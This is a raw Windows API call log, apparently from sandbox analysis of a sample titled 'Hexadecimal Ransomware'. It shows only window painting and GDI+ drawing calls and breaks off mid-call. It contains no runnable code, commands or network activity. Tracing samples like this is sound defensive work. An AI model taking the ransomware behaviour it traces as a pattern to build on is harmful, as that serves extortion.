[0161.171] GetDeviceCaps (hdc=0x3010825, index=12) returned 32 [0161.171] GetDeviceCaps (hdc=0x3010825, index=14) returned 1 [0161.171] DeleteDC (hdc=0x3010825) returned 1 [0161.171] GetCurrentObject (hdc=0x1601081f, type=0x1) returned 0xb00017 [0161.171] GetCurrentObject (hdc=0x1601081f, type=0x2) returned 0x900010 [0161.171] GetCurrentObject (hdc=0x1601081f, type=0x7) returned 0x3050821 [0161.171] GetCurrentObject (hdc=0x1601081f, type=0x6) returned 0x8a01c2 [0161.172] SaveDC (hdc=0x1601081f) returned 1 [0161.172] GetNearestColor (hdc=0x1601081f, color=0x0) returned 0x0 [0161.173] CreateSolidBrush (color=0x0) returned 0x100826 [0161.173] FillRect (hDC=0x1601081f, lprc=0x11fe078, hbr=0x100826) returned 1 [0161.173] DeleteObject (ho=0x100826) returned 1 [0161.174] RestoreDC (hdc=0x1601081f, nSavedDC=-1) returned 1 [0161.174] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0161.174] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0161.174] GetSystemMetrics (nIndex=42) returned 0 [0161.174] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe118, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0161.174] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe118) returned 0x16 [0161.174] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe178 | out: lpRect=0x11fe178) returned 1 [0161.174] GetCurrentObject (hdc=0x1601081f, type=0x1) returned 0xb00017 [0161.174] GetCurrentObject (hdc=0x1601081f, type=0x2) returned 0x900010 [0161.175] GetCurrentObject (hdc=0x1601081f, type=0x7) returned 0x3050821 [0161.175] GetCurrentObject (hdc=0x1601081f, type=0x6) returned 0x8a01c2 [0161.175] SaveDC (hdc=0x1601081f) returned 1 [0161.175] GetNearestColor (hdc=0x1601081f, color=0x0) returned 0x0 [0161.175] CreateSolidBrush (color=0x0) returned 0x1100826 [0161.175] FillRect (hDC=0x1601081f, lprc=0x11fe018, hbr=0x1100826) returned 1 [0161.175] DeleteObject (ho=0x1100826) returned 1 [0161.175] RestoreDC (hdc=0x1601081f, nSavedDC=-1) returned 1 [0161.175] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0161.175] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0161.175] GetSystemMetrics (nIndex=42) returned 0 [0161.175] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe118, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0161.175] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe118) returned 0x16 [0161.176] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x14, wParam=0x10105d6, lParam=0x0) returned 0x1 [0161.176] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.176] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.177] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x14, wParam=0x10105d6, lParam=0x0) returned 0x1 [0161.177] GetStockObject (i=5) returned 0x900015 [0161.177] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.177] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.177] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.178] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.178] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.178] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.179] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe940 | out: lpwndpl=0x11fe940) returned 1 [0161.179] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x47, wParam=0x0, lParam=0x11fec14) returned 0x0 [0161.179] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe8f0 | out: lpRect=0x11fe8f0) returned 1 [0161.179] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11fe8f0 | out: lpRect=0x11fe8f0) returned 1 [0161.180] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x5, wParam=0x0, lParam=0x2a102f7) returned 0x0 [0161.180] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x3, wParam=0x0, lParam=0xd500be) returned 0x0 [0161.180] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe920 | out: lpRect=0x11fe920) returned 1 [0161.180] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11fe920 | out: lpRect=0x11fe920) returned 1 [0161.181] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.183] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x46, wParam=0x0, lParam=0x11febd4) returned 0x0 [0161.183] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x83, wParam=0x1, lParam=0x11febac) returned 0x0 [0161.186] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.188] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe91c | out: lpwndpl=0x11fe91c) returned 1 [0161.188] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe8c8 | out: lpRect=0x11fe8c8) returned 1 [0161.188] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0161.188] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0161.188] GetSystemMetrics (nIndex=42) returned 0 [0161.188] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe770, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0161.188] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe770) returned 0x16 [0161.188] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe7d0 | out: lpRect=0x11fe7d0) returned 1 [0161.188] GetCurrentObject (hdc=0xf0105ee, type=0x1) returned 0xb00017 [0161.188] GetCurrentObject (hdc=0xf0105ee, type=0x2) returned 0x900010 [0161.188] GetCurrentObject (hdc=0xf0105ee, type=0x7) returned 0x5080b [0161.188] GetCurrentObject (hdc=0xf0105ee, type=0x6) returned 0x8a01c2 [0161.189] SaveDC (hdc=0xf0105ee) returned 1 [0161.189] GetNearestColor (hdc=0xf0105ee, color=0x0) returned 0x0 [0161.189] CreateSolidBrush (color=0x0) returned 0x2100826 [0161.189] FillRect (hDC=0xf0105ee, lprc=0x11fe670, hbr=0x2100826) returned 1 [0161.189] DeleteObject (ho=0x2100826) returned 1 [0161.189] RestoreDC (hdc=0xf0105ee, nSavedDC=-1) returned 1 [0161.190] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.233] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.234] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x1 [0161.234] SetTextColor (hdc=0x10105d6, color=0x0) returned 0x0 [0161.234] SetBkColor (hdc=0x10105d6, color=0xffffff) returned 0xffffff [0161.235] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe2e4 | out: lpwndpl=0x11fe2e4) returned 1 [0161.235] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe290 | out: lpRect=0x11fe290) returned 1 [0161.235] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0161.235] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0161.235] GetSystemMetrics (nIndex=42) returned 0 [0161.235] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe138, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0161.235] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe138) returned 0x16 [0161.235] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe198 | out: lpRect=0x11fe198) returned 1 [0161.235] GetCurrentObject (hdc=0x1701081f, type=0x1) returned 0xb00017 [0161.235] GetCurrentObject (hdc=0x1701081f, type=0x2) returned 0x900010 [0161.235] GetCurrentObject (hdc=0x1701081f, type=0x7) returned 0x3050821 [0161.235] GetCurrentObject (hdc=0x1701081f, type=0x6) returned 0x8a01c2 [0161.236] SaveDC (hdc=0x1701081f) returned 1 [0161.236] GetNearestColor (hdc=0x1701081f, color=0x0) returned 0x0 [0161.236] CreateSolidBrush (color=0x0) returned 0x3100826 [0161.236] FillRect (hDC=0x1701081f, lprc=0x11fe038, hbr=0x3100826) returned 1 [0161.236] DeleteObject (ho=0x3100826) returned 1 [0161.236] RestoreDC (hdc=0x1701081f, nSavedDC=-1) returned 1 [0161.236] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0161.236] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0161.236] GetSystemMetrics (nIndex=42) returned 0 [0161.236] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe0d8, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0161.236] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe0d8) returned 0x16 [0161.236] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe138 | out: lpRect=0x11fe138) returned 1 [0161.236] GetCurrentObject (hdc=0x1701081f, type=0x1) returned 0xb00017 [0161.237] GetCurrentObject (hdc=0x1701081f, type=0x2) returned 0x900010 [0161.237] GetCurrentObject (hdc=0x1701081f, type=0x7) returned 0x3050821 [0161.237] GetCurrentObject (hdc=0x1701081f, type=0x6) returned 0x8a01c2 [0161.237] SaveDC (hdc=0x1701081f) returned 1 [0161.237] GetNearestColor (hdc=0x1701081f, color=0x0) returned 0x0 [0161.237] CreateSolidBrush (color=0x0) returned 0x4100826 [0161.237] FillRect (hDC=0x1701081f, lprc=0x11fdfd8, hbr=0x4100826) returned 1 [0161.237] DeleteObject (ho=0x4100826) returned 1 [0161.237] RestoreDC (hdc=0x1701081f, nSavedDC=-1) returned 1 [0161.237] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0161.237] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0161.237] GetSystemMetrics (nIndex=42) returned 0 [0161.237] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe0d8, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0161.237] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe0d8) returned 0x16 [0161.239] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x14, wParam=0x10105d6, lParam=0x0) returned 0x1 [0161.240] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.240] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.240] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x14, wParam=0x10105d6, lParam=0x0) returned 0x1 [0161.240] GetStockObject (i=5) returned 0x900015 [0161.241] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.241] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.241] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.242] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.242] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.243] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.243] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe900 | out: lpwndpl=0x11fe900) returned 1 [0161.244] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x47, wParam=0x0, lParam=0x11febd4) returned 0x0 [0161.244] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x5, wParam=0x0, lParam=0x2a102f7) returned 0x0 [0161.244] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0161.244] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0161.247] IsWindowUnicode (hWnd=0x202c8) returned 1 [0161.247] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.248] TranslateMessage (lpMsg=0x11fed00) returned 0 [0161.248] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0161.248] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0161.249] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.249] IsWindowUnicode (hWnd=0x202c8) returned 1 [0161.249] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.249] TranslateMessage (lpMsg=0x11fed00) returned 0 [0161.249] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0161.250] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.251] IsWindowUnicode (hWnd=0x202c8) returned 1 [0161.251] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.251] TranslateMessage (lpMsg=0x11fed00) returned 0 [0161.251] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0161.251] BeginPaint (in: hWnd=0x202c8, lpPaint=0x11fe770 | out: lpPaint=0x11fe770) returned 0x10105d6 [0161.251] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.353] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe44c | out: lpwndpl=0x11fe44c) returned 1 [0161.353] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe3f8 | out: lpRect=0x11fe3f8) returned 1 [0161.353] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0161.353] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0161.353] GetSystemMetrics (nIndex=42) returned 0 [0161.353] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe2a0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0161.353] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe2a0) returned 0x16 [0161.353] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe300 | out: lpRect=0x11fe300) returned 1 [0161.353] GetCurrentObject (hdc=0x10105d6, type=0x1) returned 0xb00017 [0161.353] GetCurrentObject (hdc=0x10105d6, type=0x2) returned 0x900010 [0161.354] GetCurrentObject (hdc=0x10105d6, type=0x7) returned 0x5080b [0161.354] GetCurrentObject (hdc=0x10105d6, type=0x6) returned 0x8a01c2 [0161.354] SaveDC (hdc=0x10105d6) returned 1 [0161.354] GetNearestColor (hdc=0x10105d6, color=0x0) returned 0x0 [0161.354] CreateSolidBrush (color=0x0) returned 0x5100826 [0161.354] FillRect (hDC=0x10105d6, lprc=0x11fe1a0, hbr=0x5100826) returned 1 [0161.355] DeleteObject (ho=0x5100826) returned 1 [0161.355] RestoreDC (hdc=0x10105d6, nSavedDC=-1) returned 1 [0161.357] GdipCreateHalftonePalette () returned 0x1808081b [0161.358] SelectPalette (hdc=0x10105d6, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0161.358] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0161.358] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0161.358] GetSystemMetrics (nIndex=42) returned 0 [0161.358] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe6e8, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0161.358] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe6e8) returned 0x16 [0161.358] SelectPalette (hdc=0x10105d6, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0161.359] EndPaint (hWnd=0x202c8, lpPaint=0x11fe76c) returned 1 [0161.359] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.359] IsWindowUnicode (hWnd=0x202ca) returned 1 [0161.359] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.359] TranslateMessage (lpMsg=0x11fed00) returned 0 [0161.359] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0161.359] BeginPaint (in: hWnd=0x202ca, lpPaint=0x11fe790 | out: lpPaint=0x11fe790) returned 0xf0105ee [0161.359] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.360] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0161.362] CreateCompatibleDC (hdc=0xf0105ee) returned 0x11010816 [0161.362] GetObjectType (h=0xf0105ee) returned 0x3 [0161.363] CreateCompatibleBitmap (hdc=0xf0105ee, cx=1, cy=1) returned 0x205081d [0161.363] GetDIBits (in: hdc=0xf0105ee, hbm=0x205081d, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x11fe280, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe280) returned 1 [0161.363] GetDIBits (in: hdc=0xf0105ee, hbm=0x205081d, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x11fe280, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe280) returned 1 [0161.363] DeleteObject (ho=0x205081d) returned 1 [0161.364] CreateDIBSection (in: hdc=0xf0105ee, lpbmi=0x11fe2d0, usage=0x0, ppvBits=0x11fe7c4, hSection=0x0, offset=0x0 | out: ppvBits=0x11fe7c4) returned 0x7050815 [0161.364] SelectObject (hdc=0x11010816, h=0x7050815) returned 0x85000f [0161.364] GdipCreateFromHDC (hdc=0x11010816, graphics=0x11fe7a8) returned 0x0 [0161.386] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0161.386] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=88, height=120, combineMode=0x0) returned 0x0 [0161.396] GdipCreateMatrix (matrix=0x11fe7f0) returned 0x0 [0161.397] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0161.397] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe808) returned 0x0 [0161.397] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551810 [0161.398] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1551810) returned 0x0 [0161.399] LocalFree (hMem=0x1551810) returned 0x0 [0161.400] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0161.400] GdipCreateRegion (region=0x11fe7f0) returned 0x0 [0161.400] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0161.401] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7fc) returned 0x0 [0161.408] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe828) returned 0x0 [0161.408] GetWindowTextLengthW (hWnd=0x202ca) returned 0 [0161.408] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0161.408] GetSystemMetrics (nIndex=42) returned 0 [0161.408] GetWindowTextW (in: hWnd=0x202ca, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0161.408] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0161.408] GetClientRect (in: hWnd=0x202ca, lpRect=0x11fe7f0 | out: lpRect=0x11fe7f0) returned 1 [0161.410] GdipCreateRegion (region=0x11fe644) returned 0x0 [0161.410] GdipGetClip (graphics=0x6e19d80, region=0x6e1a380) returned 0x0 [0161.410] GdipCreateMatrix (matrix=0x11fe644) returned 0x0 [0161.410] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a410) returned 0x0 [0161.410] GdipIsMatrixIdentity (matrix=0x6e1a410, result=0x11fe65c) returned 0x0 [0161.410] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551810 [0161.410] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1551810) returned 0x0 [0161.410] LocalFree (hMem=0x1551810) returned 0x0 [0161.421] GdipCombineRegionRegion (region=0x6e1a380, region2=0x6e1a090, combineMode=0x1) returned 0x0 [0161.460] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551ae8 [0161.460] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1551ae8) returned 0x0 [0161.461] LocalFree (hMem=0x1551ae8) returned 0x0 [0161.461] GdipDeleteMatrix (matrix=0x6e1a410) returned 0x0 [0161.461] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe684) returned 0x0 [0161.461] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe674) returned 0x0 [0161.461] GdipGetRegionHRgn (region=0x6e1a380, graphics=0x6e19d80, hRgn=0x11fe674) returned 0x0 [0161.471] GdipDeleteRegion (region=0x6e1a380) returned 0x0 [0161.472] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe68c) returned 0x0 [0161.472] GetCurrentObject (hdc=0x11010816, type=0x1) returned 0xb00017 [0161.472] GetCurrentObject (hdc=0x11010816, type=0x2) returned 0x900010 [0161.472] GetCurrentObject (hdc=0x11010816, type=0x7) returned 0x7050815 [0161.472] GetCurrentObject (hdc=0x11010816, type=0x6) returned 0x8a01c2 [0161.472] SaveDC (hdc=0x11010816) returned 1 [0161.473] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x8040825 [0161.473] GetClipRgn (hdc=0x11010816, hrgn=0x8040825) returned 0 [0161.473] SelectClipRgn (hdc=0x11010816, hrgn=0x7040822) returned 2 [0161.473] DeleteObject (ho=0x8040825) returned 1 [0161.473] DeleteObject (ho=0x7040822) returned 1 [0161.474] OffsetViewportOrgEx (in: hdc=0x11010816, x=0, y=0, lppt=0x33334bc | out: lppt=0x33334bc) returned 1 [0161.474] GetNearestColor (hdc=0x11010816, color=0x0) returned 0x0 [0161.474] CreateSolidBrush (color=0x0) returned 0x6100826 [0161.474] FillRect (hDC=0x11010816, lprc=0x11fe690, hbr=0x6100826) returned 1 [0161.475] DeleteObject (ho=0x6100826) returned 1 [0161.475] RestoreDC (hdc=0x11010816, nSavedDC=-1) returned 1 [0161.475] GdipReleaseDC (graphics=0x6e19d80, hdc=0x11010816) returned 0x0 [0161.476] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfdb70dbd) returned 0x0 [0161.476] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0161.476] GetWindowTextLengthW (hWnd=0x202ca) returned 0 [0161.476] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0161.476] GetSystemMetrics (nIndex=42) returned 0 [0161.476] GetWindowTextW (in: hWnd=0x202ca, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0161.476] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0161.479] GdipGetImageWidth (image=0x6e0f260, width=0x11fe6c4) returned 0x0 [0161.479] GdipGetImageHeight (image=0x6e0f260, height=0x11fe6c4) returned 0x0 [0161.480] GdipDrawImageRectI (graphics=0x6e19d80, image=0x6e0f260, x=0, y=0, width=107, height=113) returned 0x0 [0161.669] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7e8) returned 0x0 [0161.670] BitBlt (hdc=0xf0105ee, x=0, y=0, cx=88, cy=120, hdcSrc=0x11010816, x1=0, y1=0, rop=0xcc0020) returned 1 [0161.671] GdipReleaseDC (graphics=0x6e19d80, hdc=0x11010816) returned 0x0 [0161.671] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0161.708] SelectObject (hdc=0x11010816, h=0x85000f) returned 0x7050815 [0161.709] DeleteDC (hdc=0x11010816) returned 1 [0161.709] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0161.709] EndPaint (hWnd=0x202ca, lpPaint=0x11fe78c) returned 1 [0161.709] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.709] IsWindowUnicode (hWnd=0x102d2) returned 1 [0161.709] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0161.709] TranslateMessage (lpMsg=0x11fed00) returned 0 [0161.709] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0161.710] BeginPaint (in: hWnd=0x102d2, lpPaint=0x11fe754 | out: lpPaint=0x11fe754) returned 0x10105d6 [0161.710] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0161.711] SelectPalette (hdc=0x10105d6, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0161.711] CreateCompatibleDC (hdc=0x10105d6) returned 0x14010816 [0161.711] DeleteObject (ho=0x7050815) returned 1 [0161.711] GetObjectType (h=0x10105d6) returned 0x3 [0161.712] CreateCompatibleBitmap (hdc=0x10105d6, cx=1, cy=1) returned 0x405081d [0161.712] GetDIBits (in: hdc=0x10105d6, hbm=0x405081d, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x11fe244, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe244) returned 1 [0161.712] GetDIBits (in: hdc=0x10105d6, hbm=0x405081d, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x11fe244, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe244) returned 1 [0161.712] DeleteObject (ho=0x405081d) returned 1 [0161.712] CreateDIBSection (in: hdc=0x10105d6, lpbmi=0x11fe294, usage=0x0, ppvBits=0x11fe788, hSection=0x0, offset=0x0 | out: ppvBits=0x11fe788) returned 0x8050815 [0161.712] SelectObject (hdc=0x14010816, h=0x8050815) returned 0x85000f [0161.713] GdipCreateFromHDC (hdc=0x14010816, graphics=0x11fe76c) returned 0x0 [0161.713] GdipTranslateWorldTransform (graphics=0x6e19d10, 